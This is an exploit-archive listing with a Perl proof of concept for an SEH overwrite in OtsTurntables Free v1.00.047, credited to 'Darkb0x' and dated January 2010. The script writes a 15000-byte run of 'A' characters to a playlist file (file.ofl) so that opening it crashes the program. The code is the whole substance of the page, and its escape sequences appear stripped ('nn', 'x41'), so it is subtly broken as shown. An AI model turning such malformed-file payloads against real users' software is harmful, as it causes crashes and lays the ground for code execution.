[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OtsTurntables Free v1.00.047 SEH Overwrite POC
# Published : 2010-01-15
# Author : Darkb0x
# Previous Title : Xunlei XPPlayer <= 5.9.14.1246 ActiveX Remote Exec 0day POC
# Next Title : Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC
# Exploit Title: OtsTurntables Free v1.00.047 SEH Overwrite POC
# Date: 14-01-2010
# Author: Darkb0x
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on: Windows Vista Ultimate English
# [exploit code]
print "nnBy Darkb0xn" ;
print "Home Page :n" ;
print "http://NullArea.Netn" ;
my $junk = "x41" x 15000 ;
my $exploit = $junk;
open (file,">>file.ofl");
print file $exploit;
close (file);
print "nnnFile Creation donen";